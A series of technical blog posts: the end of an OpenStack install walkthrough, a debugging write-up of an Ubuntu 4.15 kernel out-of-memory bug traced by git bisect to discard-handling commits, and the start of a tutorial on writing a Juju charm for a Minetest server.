4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:09:13 UTC 2016
$ hostname
myfirstinstance
$ free -m
             total         used         free       shared      buffers
Mem:            46           34           11            0            3
-/+ buffers:                 31           15
Swap:            0            0            0

You know, if you made it this far, and have a working OpenStack cluster, you deserve a medal! Really, excellent work.

$ figlet Well Done!
__        __   _ _   ____                   _ 
\ \      / /__| | | |  _ \  ___  _ __   ___| |
 \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ |
  \ V  V /  __/ | | | |_| | (_) | | | |  __/_|
   \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_)
                                              

Useful Things We Can Do From Horizon

Horizon aims to implement most tasks users want to do on a regular basis, which is primarily to create and manage their virtual machines they wish to provision. Horizon can do some neat things to help users with that like:

Horizon can display everything you want to know about your instance:

Horizon can show you network interfaces on your instance:

Horizon can give you a listing of the instances syslog:

Horizon can even give you a web based VNC-like remote terminal to your instance:

Of course, Horizon can also help you launch instances:

Conclusion

Well, I have to say, this blog post has been an absolute journey. OpenStack is by far the most complicated software package that I have installed and configured, in both the time needed and sheer amount of moving parts aspects.

I started this post with only a vague idea of what OpenStack is and what it does, but now, after installing each of the primary services, configuring them, and seeing how they come together, I now understand the purpose of each service and sub-service, as well as a good idea of how they are implemented and the design decisions made.

We haven’t touched too much on usage and debugging OpenStack too much, since this blog post is much too long already, but that will be coming in the future.

I hope you enjoyed the read, and if you have been following along, I hope you have a working cluster.

As always, if you have any questions, feel free to contact me.

Matthew Ruffell

Analysis of an Out Of Memory Kernel Bug in the Ubuntu 4.15 Kernel

2019-12-13T00:00:00+00:00

As mentioned previously, I will write about particularly interesting cases I have worked from start to completion from time to time on this blog.

This is another of those cases. Today, we are going to look at a case where creating a seemingly innocent RAID array triggers a kernel bug which causes the system to allocate all of its memory and subsequently crash.

Let’s start digging into this and get this fixed.

Reproducing the Issue

Before we start hunting for kernel commits to see if we can fix the problem, it is always a good idea to reproduce the issue if possible and see what we can learn. This gives us a fresh set of logs on small isolated test systems, so we can be sure the command we previously ran caused the issue and not something else that may be running on a customer system.

Reading the case, the complaint is that when trying to format a RAID array of several disks with the xfs file system, the system hangs for a short time, ssh sessions disconnect, and if you reconnect, dmesg shows that the Out Of Memory (OOM) reaper has come out and killed most processes, including the SSH daemon.

The case mentions that the underlying disks are NVMe devices, so we will try and reproduce using NVMe disks.

Again, my system does not have any NVMe devices, let alone 8 of them, so we will probably use a cloud computing service for a test system. Google Cloud Platform is probably the best for this case, since it lets you easily add any number of NVMe based scratch disks to your instance.

Open up the dashboard, and create a new instance. Select Ubuntu 18.04 as the operating system, and leave the main disk as 10gb. Head down to the “Add additional disks” section, and from the dropdown, select “Local SSD Scratch disk” and make sure they are NVMe. In the number of disks, drag the slider to 8.

Go ahead and make the instance. It might be a little pricey, but we aren’t going to be using this instance for too long, so make sure to terminate it as soon as you are finished with it.

SSH into the instance. To reproduce, we need to be running the 4.15.0-58-generic kernel, so we can install that like so:

sudo apt update
sudo apt install linux-image-4.15.0-58-generic linux-modules-4.15.0-58-generic linux-modules-extra-4.15.0-58-generic linux-headers-4.15.0-58 linux-headers-4.15.0-58-generic
sudo nano /etc/default/grub
- Change GRUB_DEFAULT=0 to GRUB_DEFAULT="1>2"
sudo nano /etc/default/grub.d/50-cloudimg-settings.cfg
- Comment out GRUB_DEFAULT=0 with a #.
sudo update-grub
sudo reboot

This installs the 4.15.0-58 kernel and changes the grub config to boot into it by default, since we can’t open the grub menu on cloud instances.

Once the instance comes back up again, check uname -rv to ensure we are in the correct kernel:

$ uname -rv
4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019

Good. Lets see what devices our NVMe disks are:

Seem to be based on nvme0nX.

Time to reproduce. Create a RAID array with:

sudo su
mdadm --create /dev/md0 --level=0 --raid-devices=8 /dev/nvme0n1 /dev/nvme0n2 /dev/nvme0n3 /dev/nvme0n4 /dev/nvme0n5 /dev/nvme0n6 /dev/nvme0n7 /dev/nvme0n8
mkfs.xfs -f /dev/md0

Nothing will happen for a few seconds, and then the SSH session will disconnect:

Pretty strange behaviour really. Reconnect, and examine dmesg:

CPU: 0 PID: 776 Comm: systemd-network Not tainted 4.15.0-58-generic #64-Ubuntu
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
 dump_stack+0x63/0x8b
 dump_header+0x71/0x285
 oom_kill_process+0x220/0x440
 out_of_memory+0x2d1/0x4f0
 __alloc_pages_slowpath+0xa53/0xe00
 ? alloc_pages_current+0x6a/0xe0
 __alloc_pages_nodemask+0x29a/0x2c0
 alloc_pages_current+0x6a/0xe0
 __page_cache_alloc+0x81/0xa0
 filemap_fault+0x378/0x6f0
 ? filemap_map_pages+0x181/0x390
 ext4_filemap_fault+0x31/0x44
 __do_fault+0x24/0xe5
 __handle_mm_fault+0xdef/0x1290
 handle_mm_fault+0xb1/0x1f0
 __do_page_fault+0x281/0x4b0
 do_page_fault+0x2e/0xe0
 ? page_fault+0x2f/0x50
 page_fault+0x45/0x50

We see a fairly standard call trace saying the system hit a page fault, and when it tried to allocate a new page with __page_cache_alloc(), that failed to, taking the slowpath, which realised the system was out of memory, and invoked the OOM reaper.

Reading down, we find a printout of all the memory currently located in the SLAB.

Unreclaimable slab info:
Name                      Used          Total
RAWv6                     15KB         15KB
UDPv6                     15KB         15KB
TCPv6                     31KB         31KB
mqueue_inode_cache         7KB          7KB
fuse_request               3KB          3KB
RAW                        7KB          7KB
tw_sock_TCP                3KB          3KB
request_sock_TCP           3KB          3KB
TCP                       16KB         16KB
hugetlbfs_inode_cache      7KB          7KB
eventpoll_pwq              7KB          7KB
eventpoll_epi              8KB          8KB
request_queue            118KB        311KB
dmaengine-unmap-256       30KB         30KB
dmaengine-unmap-128       15KB         15KB
file_lock_cache            3KB          3KB
net_namespace             27KB         27KB
shmem_inode_cache        476KB        550KB
taskstats                  7KB          7KB
sigqueue                   3KB          3KB
kernfs_node_cache       6726KB       6968KB
mnt_cache                146KB        146KB
filp                      92KB        152KB
lsm_file_cache            35KB         35KB
nsproxy                    3KB          3KB
vm_area_struct            74KB        108KB
mm_struct                 61KB         61KB
files_cache               22KB         22KB
signal_cache              88KB         88KB
sighand_cache            185KB        185KB
task_struct              517KB        540KB
cred_jar                  47KB         47KB
anon_vma                 106KB        106KB
pid                      114KB        140KB
Acpi-Operand              74KB         74KB
Acpi-ParseExt              7KB          7KB
Acpi-State                11KB         11KB
Acpi-Namespace            15KB         15KB
numa_policy                3KB          3KB
trace_event_file         122KB        122KB
ftrace_event_field       167KB        167KB
task_group                39KB         39KB
kmalloc-8192            1344KB       1344KB
kmalloc-4096             856KB        960KB
kmalloc-2048            1346KB       1424KB
kmalloc-1024            1042KB       1064KB
kmalloc-512              466KB        480KB
kmalloc-256          3499256KB    3499256KB
kmalloc-192              311KB        311KB
kmalloc-128             1156KB       1156KB
kmalloc-96               155KB        216KB
kmalloc-64               367KB        432KB
kmalloc-32               336KB        336KB
kmalloc-16                60KB         60KB
kmalloc-8                 32KB         32KB
kmem_cache_node           80KB         80KB
kmem_cache               396KB        453KB

Everything looks pretty normal, apart from the kmalloc-256 slab. If you are unfamiliar with how kernel memory allocation works in Linux, maybe take a moment and read the blog post I wrote it on it here:

Looking at kmalloc() and the SLUB Memory Allocator

Back to the kmalloc-256 slab. Looking at it, there is 3499256KB used! Converting 3499256KB to gigabytes gives us 3.49GB. Our little cloud instance only has 3.75GB of ram by default, so it seems something has caused all the system memory to get caught up in the kmalloc-256 slab.

Finding a Workaround

The next thing to do is try some other kernels to see if we can reproduce.

I tried the Bionic HWE kernel, based on the 5.0 kernel that Ubuntu 19.04 Disco Dingo uses. I wasn’t able to reproduce.

The next thing I tried was a previous Bionic kernel. The previous released kernel is 4.15.0-55-generic, and I wasn’t able to reproduce either.

Both are good news. Anyone affected by this bug can use the previous kernel or the HWE kernel while this gets fixed. It also tells us that this was introduced somewhere between 4.15.0-56 to 4.15.0-58.

Searching for the Root Cause

Time to dive into the commits for the kernel to see if we can determine anything from a quick look.

We know the problem between 4.15.0-56 to 4.15.0-58, so let’s have a look at those releases.

If we look at the git tree located at:

git://kernel.ubuntu.com/ubuntu/ubuntu-bionic.git

There are four tags we are interested in:

$ git tag
...
Ubuntu-4.15.0-55.60
Ubuntu-4.15.0-56.62
Ubuntu-4.15.0-57.63
Ubuntu-4.15.0-58.64
...

We can use git log to see what is in each tag:

git log --oneline Ubuntu-4.15.0-57.63..Ubuntu-4.15.0-58.64
9bff5f095923 (tag: Ubuntu-4.15.0-58.64) UBUNTU: Ubuntu-4.15.0-58.64
fca95d49540c Revert "new primitive: discard_new_inode()"
90c14a74ff26 Revert "ovl: set I_CREATING on inode being created"
544300b72249 UBUNTU: Start new release

Seems some small regressions were reverted in 4.15.0-58, and is otherwise a small release likely made late in the SRU cycle.

$ git log --oneline Ubuntu-4.15.0-56.62..Ubuntu-4.15.0-57.63
7c905029d1e1 (tag: Ubuntu-4.15.0-57.63) UBUNTU: Ubuntu-4.15.0-57.63
3536b6c0146c x86/speculation/swapgs: Exclude ATOMs from speculation through SWAPGS
fb8801640c8d x86/entry/64: Use JMP instead of JMPQ
1592edcea558 x86/speculation: Enable Spectre v1 swapgs mitigations
2efd2444a88e x86/speculation: Prepare entry code for Spectre v1 swapgs mitigations
cdb3893f2b04 x86/cpufeatures: Combine word 11 and 12 into a new scattered features word
a015c7c9e9f7 x86/cpufeatures: Carve out CQM features retrieval
ebd969e74a54 UBUNTU: update dkms package versions
29331dc18182 UBUNTU: Start new release

4.15.0-57 seems pretty quiet as well. Seems to be fixes for CVE-2019-1125, also not unusual to happen late in a SRU cycle.

The flaw is likely to fall into 4.15.0-56 then:

$ git log --oneline Ubuntu-4.15.0-55.60..Ubuntu-4.15.0-56.62 | wc -l
2787

2787 commits are present in 4.15.0-56! That is one big release, and we aren’t going to be able to read all of those commits.

I had a good read through all the subjects, and examined many commits, but nothing immediately jumped out as something that can cause the kernel to runaway, allocating memory until it cannot anymore, that is caused by the block, or filesystem, or maybe NVMe subsystems.

Since we are limited on time, and we know a definitive start and end points to where the behaviour is introduced, and can easily reproduce the issue ourselves, this case is a good candidate for a git bisect.

git bisect is a tool which uses a basic binary search algorithm to hone in on a commit which breaks things. At each iteration, the midway point is selected between good and bad commits. This lets us get through all 2787 commits in as little as 12 or so tests.

We need to tell git bisect what tag is good and what tag is bad. We can do that like so:

$ git bisect start Ubuntu-4.15.0-56.62 Ubuntu-4.15.0-55.60
Bisecting: 1393 revisions left to test after this (roughly 11 steps)
[9cac6a2d2438924773cef5b30eab8f72d5a5ea3f] selftests/x86: Add clock_gettime() tests to test_vdso

We will look between 4.15.0-55, which was good, and 4.15.0-56, which was bad.

From here, we can go and build a test kernel, create a new cloud instance with lots of NVMe disks and try and reproduce. After doing all this, I can say that commit 9cac6a2d2438924773cef5b30eab8f72d5a5ea3f, which is halfway between 4.15.0-55 and 4.15.0-56, is good, and the problem could not be reproduced.

So I tell git that.

$ git bisect good
Bisecting: 696 revisions left to test after this (roughly 10 steps)
[621db8f68ea5dc1389cc29de188c62b708520115] vhost/scsi: truncate T10 PI iov_iter to prot_bytes

It gives us a new commit to test. This is halfway between 4.15.0-55 and 621db8f68ea5dc1389cc29de188c62b708520115, or on a bigger scale, a quarter of the way between 4.15.0-55 and 4.15.0-56. Nice. Again, build a test kernel, upload to a new cloud instance and try reproduce. This time, I managed to see the OOM problem, and the system crashed.

So I tell git that.

This keeps going until we hone in on the commit which causes the problem:

$ git bisect bad
Bisecting: 348 revisions left to test after this (roughly 9 steps)
[caed9931cfca4728ede493925804551759a17412] cdc-acm: fix race between reset and control messaging

$ git bisect good
Bisecting: 174 revisions left to test after this (roughly 8 steps)
[309d43a67a3a24ebf5ef72f3dcdc00dfcdd8c3fb] KVM: arm64: Fix caching of host MDCR_EL2 value

$ git bisect good
Bisecting: 87 revisions left to test after this (roughly 7 steps)
[d06521337ebd71f654b606612714c48e34aacd35] bcache: Populate writeback_rate_minimum attribute

$ git bisect bad
Bisecting: 43 revisions left to test after this (roughly 6 steps)
[97f76c511e9a41bc19282a921e53545ce08e168c] btrfs: Ensure btrfs_trim_fs can trim the whole filesystem

$ git bisect good
Bisecting: 21 revisions left to test after this (roughly 5 steps)
[edf57bb077f89c6e95003bdacc9478f52a37fd46] MD: fix invalid stored role for a disk - try2

$ git bisect good
Bisecting: 10 revisions left to test after this (roughly 4 steps)
[b6b0136869f05706228bb13511db7798af2c232b] mailbox: PCC: handle parse error

$ git bisect bad
Bisecting: 5 revisions left to test after this (roughly 3 steps)
[b515257f186e532e0668f7deabcb04b5d27505cf] block: make sure discard bio is aligned with logical block size

$ git bisect bad
Bisecting: 2 revisions left to test after this (roughly 1 step)
[da64877868c5ea90f741a31261205dae67139f59] mtd: spi-nor: fsl-quadspi: Don't let -EINVAL on the bus

$ git bisect good
Bisecting: 0 revisions left to test after this (roughly 1 step)
[3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34] block: don't deal with discard limit in blkdev_issue_discard()

$ git bisect bad
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[894c8a9ad1d7e551bfbce5422c68816bc69146a2] bcache: correct dirty data statistics

$ git bisect good
3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34 is the first bad commit
commit 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800

block: don't deal with discard limit in blkdev_issue_discard()

BugLink: https://bugs.launchpad.net/bugs/1836802

commit 744889b7cbb56a64f957e65ade7cb65fe3f35714 upstream.

blk_queue_split() does respect this limit via bio splitting, so no
need to do that in blkdev_issue_discard(), then we can align to
normal bio submit(bio_add_page() & submit_bio()).

More importantly, this patch fixes one issue introduced in a22c4d7e34402cc
("block: re-add discard_granularity and alignment checks"), in which
zero discard bio may be generated in case of zero alignment.

Fixes: a22c4d7e34402ccdf3 ("block: re-add discard_granularity and alignment checks")

:040000 040000 7483c1408acdee78933db770716b9b18f16d7644 b59d8fa70f2b07fb0a08b42aaab78daa8af57501 M block

Root Cause Analysis

The problem is caused by the below two commits:

commit: 744889b7cbb56a64f957e65ade7cb65fe3f35714
ubuntu-bionic: 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800
Subject: block: don't deal with discard limit in blkdev_issue_discard()
BugLink: https://bugs.launchpad.net/bugs/1836802

commit: 1adfc5e4136f5967d591c399aff95b3b035f16b7
ubuntu-bionic: b515257f186e532e0668f7deabcb04b5d27505cf
Author: Ming Lei <ming.lei@redhat.com>
Date: Mon Oct 29 20:57:17 2018 +0800
Subject: block: make sure discard bio is aligned with logical block size
BugLink: https://bugs.launchpad.net/bugs/1836802

You can read them by looking at the text files below:

Now, the fault was triggered in two stages. Firstly, in “block: don’t deal with discard limit in blkdev_issue_discard()” a while loop was changed such that there is a possibility of an infinite loop if __blkdev_issue_discard() is called with nr_sects > 0 and req_sects somehow becomes 0:

int __blkdev_issue_discard(..., sector_t nr_sects, ...)
{
...
while (nr_sects) {
    unsigned int req_sects = nr_sects;
    sector_t end_sect;

    end_sect = sector + req_sects;
...
    nr_sects -= req_sects;
    sector = end_sect;
...
}

if req_sects is 0, then end_sect is always equal to sector, and the most important part, nr_sects is only decremented in one place, by req_sects, which if 0, would lead to the infinite loop condition.

Now, since req_sects is initially equal to nr_sects, the loop would never be entered in the first place if nr_sects is 0.

This is where the second commit, “block: make sure discard bio is aligned with logical block size” comes in.

This commit adds a line to the above loop, to allow req_sects to be set to a new value:

int __blkdev_issue_discard(..., sector_t nr_sects, ...)
{
...
while (nr_sects) {
    unsigned int req_sects = nr_sects;
    sector_t end_sect;

    req_sects = min(req_sects, bio_allowed_max_sectors(q));

    end_sect = sector + req_sects;
...
    nr_sects -= req_sects;
    sector = end_sect;
...
}

We see that req_sects will now be the minimum of itself and bio_allowed_max_sectors(q), a new function introduced by the same commit.

static inline unsigned int bio_allowed_max_sectors(struct request_queue *q)
{
       return round_down(UINT_MAX, queue_logical_block_size(q)) >> 9;
}

queue_logical_block_size(q) queries the hardware for the logical block size of the underlying device.

static inline unsigned short queue_logical_block_size(struct request_queue *q)
{
    int retval = 512;

    if (q && q->limits.logical_block_size)
        retval = q->limits.logical_block_size;

    return retval;
}

If q->limits.logical_block_size is 512 or smaller, then bit shifted right by 9 yields 0.

bio_allowed_max_sectors() will return 0, and the min with req_sects == nr_sects will favour the new 0.

This causes nr_sects to never be decremented since req_sects is 0, and req_sects will never change since the min() that takes in itself will always favour the 0.

From there the infinite loop iterates and fills up the kmalloc-256 slab with newly created bio entries, until all memory is exhausted and the OOM reaper comes out and starts killing processes, which is ineffective since this is a kernel memory leak.

Finding the Commit With the Fix

The fix comes in the form of:

commit: b88aef36b87c9787a4db724923ec4f57dfd513f3
ubuntu-bionic: a55264933f12c2fdc28a66841c4724021e8c1caf
Author: Mikulas Patocka <mpatocka@redhat.com>
Date: Tue Jul 3 13:34:22 2018 -0400
Subject: block: fix infinite loop if the device loses discard capability
BugLink: https://bugs.launchpad.net/bugs/1837257

You can read it here:

block: fix infinite loop if the device loses discard capability

This adds a check right after the min(req_sects, bio_allowed_max_sectors(q)); to test if req_sects has been set to 0, and if it has, to exit the loop and move into failure handling:

...
req_sects = min(req_sects, bio_allowed_max_sectors(q));
if (!req_sects)
    goto fail;
...

From there things work as normal. As “block: fix infinite loop if the device loses discard capability” points out, all of this is triggered due to a race where if underlying device is reloaded with a metadata table that doesn’t support the discard operation, then q->limits.max_discard_sectors is set to 0 and has a knock on effect of setting q->limits.logical_block_size to strange values and leads to the infinite loop and out of memory condition.

Landing the Fix in the Kernel

As with all kernel bugs, we need to follow the Stable Release Updates procedure, and follow the special kernel specific rules.

This involves opening a launchpad bug and filling out a SRU template:

https://bugs.launchpad.net/bugs/1842271

For this particular SRU I got lucky, since “block: fix infinite loop if the device loses discard capability” was already pulled in from a upstream -stable release and already applied to master-next via:

https://bugs.launchpad.net/bugs/1837257

So I did not need to submit any patches to the Ubuntu kernel mailing list. Poor me haha. Don’t worry, there’s always next time.

The commit made its way into 4.15.0-59-generic and was eventually released as 4.15.0-60-generic. If you are using this kernel or newer, you will be running a fixed kernel and you will not see this issue.

Conclusion

There you have it. We reproduced and determined the root cause of a runaway kernel memory allocation that consumed the entire system memory, and made sure it got fixed in the next kernel update.

This case was an excellent example of when to use git bisect, since we had everything required for it to be an effective tool for this situation.

We had a close analysis of the code and managed to determine exactly what caused the infinite loop to occur, and how the fix holds up. I’m pretty happy with how this got resolved, even if git bisect is a little bland compared to other more exotic bug finding tools.

I hope you enjoyed the read, and as always, feel free to contact me.

Matthew Ruffell

Learning How to Write Juju Charms by Creating a Minetest Charm

2019-12-02T00:00:00+00:00

In my previous blog post about Juju, a tool which lets you deploy and scale software easily, we learned what Juju is, how to deploy some common software packages, debug them, and scale them.

Juju deploys Charms, a set of instructions on how to install, configure and scale a particular software package. To be able to deploy software as a Charm, a Charm has to be written first. Usually Charms are written by experts in operating that software package, so that the Charm represents the best way to configure and tune that application. But what happens if no Charm exists for something you want to deploy?

Today we are going to learn how to write our own Charms using the original Charm writing method, by making a Charm for the Minetest game server. So fire up your favourite text editor, and lets get started.

What Do We Want to Deploy?

Before we start writing our Charm, we need to collect a list of requirements and things we want to build into our Charm.

We are going to deploying a server for Minetest, which is an open source voxel game engine which implements different sub-games. Minetest is pretty much the open source alternative for Minecraft.

Minetest is written mostly in C++ and Lua, so it has excellent performance, and the game is designed to be modded. There are also a ton of configuration options that can be tweaked, so we can build those things into our Charm.

To make things a little more interesting than a basic single application Charm, I see that Minetest supports PostgreSQL as a database backend.

PostgreSQL in Minetest offers performance improvements over using the default SQLite3 DB, as well as offering the ability to store multiple Minetest “worlds” in the same PostgreSQL database instance.

So our requirements for our Minetest Charm will be:

To deploy minetest-server.
To be able to edit and set minetest-server configuration variables.
To use PostgreSQL as a database backend.

Lets get started.

Original Charms Vs Reactive Charms

There are several methods to write Charms, and each method has evolved over time with different major versions of Juju.

The original method of writing Charms was introduced in Juju 1.0, and while simple, they had the downside of not being able to know anything about a deployments state. Reactive Charms solve this problem, by storing and managing state, but it also required a fundamental change in how Charms are written.

There are a lot of Charms out there, some use the older original method, and others have been upgraded or written in the reactive method. Since both methods are still widespread, and it is likely that Charms written in both methods will need to be maintained into the future, I will eventually cover both methods. For now, we will tackle learning the original method in this blog post.

Original Charm Writing Method

I’m more or less going to be following along on the Juju documentation for the first generation charms.

Create Charm Directory Structure

Charms are more or less a collection of text files, which makes writing and modifying them very straightforward.

We will start by making a directory for our charms to live in:

$ cd ~
$ mkdir charms
$ cd charms

From there, a Charm is the collection of text files inside a directory, so we will make the directory structure we need:

$ mkdir minetest-server
$ cd minetest-server
$ touch README metadata.yaml config.yaml copyright icon.svg revision
$ mkdir hooks
$ cd hooks
$ touch start stop install db-relation-changed config-changed

Your directory structure should now look like this:

Edit the README File

All Charms need a README file, where we document what the Charm does, how to deploy it, and what its configuration options are.

Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.

This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.

To deploy:

$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju expose minetest-server

Edit the revision File

The revision file keeps track of the Charm version. We are going to keep this simple, by saying that this is the first version:

Create the metadata.yaml File

The metadata.yaml file tells Juju what this Charm is for, and what relations this Charm is capable of. It also contains important information such as the description, maintainer and so on.

The first part is straightforward:

name: minetest-server
summary: Minetest is a opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
    Minetest is a fun, opensource voxel game engine that can be customised with
    different game modes and mods.
    This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic

The next part involves describing the relations which this Charm provides. We need to list the relation type (provides, requires or peers), the name of the relation, and the interface type.

We have two relations. We provide one, Minetest, and require one, PostgreSQL.

provides:
    server:
        interface: minetest
requires:
    db:
        interface: postgresql

We don’t need a peers section, because Minetest is not designed for clustering, and all players must connect to the same server instance. Minetest is not designed to scale unfortunately.

Putting it all together, we have a fully made metadata.yaml file:

name: minetest-server
summary: Minetest is a opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
    Minetest is a fun, opensource voxel game engine that can be customised with
    different game modes and mods.
    This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic
provides:
    server:
        interface: minetest
requires:
    db:
        interface: pgsql

Describe Configuration Options in config.yaml

This is also pretty straightforward.

An example config is: (inspired by the existing config.yaml in James Tait’s older minetest charm)

options:
    port:
        default: 30000
        description: Server port to listen on
        type: int
    server-name:
        default: "Minetest server"
        description: Name of the server
        type: string
    server-description:
        default: "Juju deployed Minetest server"
        description: Description of server
        type: string
    motd:
        default: "Welcome!"
        description: Message of the day
        type: string
    strict-protocol-version-checking:
        default: "false"
        description: Set to true to disallow old clients from connecting
        type: string
    creative-mode:
        default: "false"
        description: Set to true to enable creative mode (unlimited inventory)
        type: string
    enable-damage:
        default: "false"
        description: Enable players getting damage and dying
        type: string
    default-password:
        default: ""
        description: New users need to input this password
        type: string
    default-privs:
        default: "build,shout"
        description: |
            Available privileges: build, shout, teleport, settime, privs, ban
            See /privs in game for a full list on your server and mod configuration
        type: string
    enable-pvp:
        default: "true"
        description: Whether to enable players killing each other
        type: string

Set the Copyright of the Charm

All Charms should include a copyright file, which includes details about the copyright and licensing status of the files inside the Charm.

Initially I was unsure what to place in the file, so I asked around my team. The answer I got was that the Charm archive format does not specify a specific way to license an application, so most Charms follow the debian/copyright file format.

We will take the OpenStack Keystone Charm copyright file as inspiration, so the below will do:

Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0

Files: *
Copyright: 2019, Matthew Ruffell.
License: GPL-3

License: GPL-3
 This package is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 3 of the License, or
 (at your option) any later version.
 .
 This package is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
 .
 You should have received a copy of the GNU General Public License
 along with this package; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301 USA
 .
 On Debian systems, the complete text of the GNU General
 Public License can be found in `/usr/share/common-licenses/GPL-3'.

Make an Icon for the Charm Store

If you want your Charm to look nice on the Charm store listing or on the Juju GUI, then you should probably set an icon.

We can use the Charms tools package to generate us a basic icon which we can then customise.

$ sudo snap install charm --classic
$ cd ~/charms/minetest-server
$ charm add icon

From there, open up icon.svg in Inkscape or whatever vector editor you like, and make a nice icon:

I used the icon found at /usr/share/icons/hicolor/scalable/apps/minetest.svg to make this icon.

Write Hooks

Hooks are executable files which perform the actual work of installing and maintaining the Charm. Hooks are called by Juju at specific times when each hook is required. For example, the “install” hook is called when the Charm is being deployed, and it is responsible for installing the software to the machine.

Lets implement some hooks.

‘start’ Hook

We will begin with the “start” hook. We are going to make our Minetest server a systemd service, so all this needs to do is start the service:

#!/bin/sh

set -e

status=$(status-get)

if [ $status = "active" ]
then
    juju-log "Starting Minetest Server"
    systemctl restart minetest
fi

if [ $status != "active" ]
then
    juju-log "Minetest is not ready to start. Charm is not in active state."
fi

The set -e command tells Juju that if any command returns a non zero exit code, indicating failure, the script will stop and raise an error, which Juju will then communicate to its operator.

We use systemctl restart over systemctl start due to wanting our hooks to be “idempotent”, which means the operation can be repeated many times without changing the intended result. If we try and start an already running service, we might error out and cause problems. Restart will down the service and get it back up again, and hopefully reload config changes and the like.

‘stop’ Hook

The “stop” hook is similar to “start”, and just needs to stop the service.

#!/bin/sh

set -e

juju-log "Stopping Minetest Server"
systemctl stop minetest

‘install’ Hook

The “install” hook needs to install Minetest, and also install the systemd service files.

#!/bin/sh

set -e

juju-log "Installing Minetest from repos"
apt-get -y -qq install minetest

if ! getent group minetest > /dev/null ; then
    juju-log "Adding minetest group"
    addgroup --system minetest > /dev/null
fi

if ! getent passwd minetest > /dev/null ; then
    juju-log "Adding minetest user"
    adduser --system --home /home/minetest --ingroup minetest --gecos "Minetest server" minetest > /dev/null
fi

juju-log "Setting up configuration file"
mkdir -p /home/minetest/.minetest/worlds/world
cat > /home/minetest/.minetest/worlds/world/world.mt << EOF
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
EOF
chown -R minetest:minetest /home/minetest/.minetest/

juju-log "Installing Minetest systemd service"
cat > /etc/systemd/system/minetest.service << EOF
[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page

[Service]
Type=simple
User=minetest

ExecStart=/usr/games/minetest --server

ExecStop=/bin/kill -2 $MAINPID

[Install]
WantedBy=multi-user.target
EOF

juju-log "Enabling Minetest service"
systemctl enable minetest

status-set blocked "Waiting for database connection"

Notice the use of status-set blocked? We did that to tell Juju that we need extra things in order to continue. In this case, we need a database, and for the db-relation-changed hook to be executed before we can keep going.

status-set changes the status displayed by Juju status and blocked is pretty self explanatory.

‘db-relation-changed’ Hook

Now that our install is waiting on a database connection, we had better sort out what happens when we connect our database via a relation. In this case, we want to populate our world.mt file, with database credentials and such.

We can do that with the db-relation-changed hook:

#!/bin/bash

set -e

status-set maintenance "Configuring the database"

db_user=$(relation-get user)
db_database=$(relation-get database)
db_pass=$(relation-get password)
db_host=$(relation-get private-address)
db_port=5432

if [ -z "$db_user" ]; then
  juju-log "No database information sent yet. Silently exiting"
  exit 0
fi

juju-log "Got database credentials. Making new database"

cat >> /home/minetest/.minetest/worlds/world/world.mt << EOF
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
pgsql_player_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
EOF

juju-log "Starting Minetest service"
systemctl restart minetest

status-set active

Charms need to communicate over their relations to exchange important data. For our db-relation-changed hook, we want to talk to the PostgreSQL Charm to obtain database credentials that Minetest will use to connect and access the database.

We can do that with the hook tools relation-get to obtain variables, and relation-set to send variables to the other Charm.

We used relation-get user to fetch the username, and relation-get password for the database user’s password. These are all randomly generated when we add the relation, so we can’t just hardcode these values.

‘config-changed’ Hook

The config-changed hook reacts to any changes made to the Charms configuration, and writes those changes to the backing configuration file, and normally makes an attempt at restarting the underlying service.

We can use the hook tool config-get to query the current value of a configuration setting, and set it into the file with sed commands. The config-changed hook in James Tait’s older minetest charm does this very well.

#!/bin/sh

CONFIG_FILE=/home/minetest/.minetest/worlds/world/world.mt

PORT=`config-get port`
if [ ! -z "$PORT" ]; then
    sed -i -e "s/^port \= .*/port \= ${PORT}/" $CONFIG_FILE
fi
open-port $PORT/udp

SERVER_NAME=`config-get server-name`
if [ ! -z "$SERVER_NAME" ]; then
    sed -i -e "s/^server_name \= .*/server_name \= ${SERVER_NAME}/" $CONFIG_FILE
fi

DESCRIPTION=`config-get description`
if [ ! -z "$DESCRIPTION" ]; then
    sed -i -e "s/^server_description \= .*/server_description \= ${DESCRIPTION}/" $CONFIG_FILE
fi

MOTD=`config-get motd`
if [ ! -z "$MOTD" ]; then
    sed -i -e "s/^motd \= .*/motd \= ${MOTD}/" $CONFIG_FILE
fi

